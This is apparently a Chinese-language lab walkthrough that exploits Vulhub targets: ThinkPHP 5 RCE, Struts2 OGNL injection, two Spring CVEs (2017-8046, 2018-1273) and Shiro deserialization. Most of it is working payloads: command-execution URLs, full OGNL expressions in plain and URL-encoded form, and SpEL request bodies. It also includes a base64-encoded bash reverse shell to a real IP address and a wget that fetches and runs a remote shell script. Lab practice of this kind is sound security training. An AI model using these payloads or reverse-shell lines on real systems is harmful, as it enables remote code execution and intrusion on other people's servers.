一、Thinkphp
1.打开vulhub-thinkphp-5-rce,我们来访问一下
2.进行远程命令执行
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1[]=whoami
3.进行远程代码执行
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
4.接下来我们只要将执行代码的php代码换成一句话木马即可使用webshell工具来连接
二、struts2
1.开启靶机,接着来访问一下网站,记着要拼接/struts2-showcase/
2.拼接以下语句来确定漏洞是否存在,中间的表达式可以正常运行即代表有漏洞
/struts2-showcase/${(123+123)}/actionChain1.action3.接下来使用以下语句看漏洞是否可以利用,并且需要将其进行url编码
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}%24%7B%0A%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27whoami%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D4.接下来我们就可以来构造反弹shell的语句来反弹shell了,首先来开启监听
nc -lvvp 8888bash -i >& /dev/tcp/8.141.0.63/8888 0>&1 #base64编码
YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0MS4wLjYzLzg4ODggMD4mMQ==
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0MS4wLjYzLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}对连接进行url编码
%24%7b%0a(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request%5b%27struts.valueStack%27%5d.context).(%23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ou%3d%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27bash+-c+%7becho%2cYmFzaCAtaSA%2bJiAvZGV2L3RjcC84LjE0MS4wLjYzLzg4ODggMD4mMQ%3d%3d%7d%7c%7bbase64%2c-d%7d%7c%7bbash%2c-i%7d%27)).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7d这样即可获取反弹shell
三、spring
1.Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)
1.打开靶机,然后拼接上以下内容然后访问/customers/1,然后进行抓包
2.然后将请求协议改为PATCH,请求体换为以下内容
[{"op":"replace","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value":"vulhub" }]
3.然后我们进入容器内,可以看到多了一个success
2.spring 代码执⾏ (CVE-2018-1273)
1.开启靶场之后访问一下users目录,界面如下
2.我们在用户注册是进行抓包,将请求体部分内容改为以下内容,前提是要在服务器上写一个.sh文件,并且里面写上反弹shell的内容
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("wget -O /tmp/shell.sh http://8.14.0.63:80/1.sh")]=&password=&repeatedPassword=
3.开启http服务,以确保1.sh文件可以被下载
4.然后再开启nc监听,再文件下载好之后,将命令部分的语句替换为以下语句执行,即可收到反弹shell
/bin/bash /tmp/1.sh四、shiro
1.开启一下靶场
cd vulhub-master/shiro/CVE-2016-4437
docker-compose up -d2.在IP后面加上login进行访问时进行抓包,在抓到的包里面加上cookie字段,元素为remember值随便,看返回的数据包有没有set-cookie头,有说明存在漏洞
3.使用工具进行利用
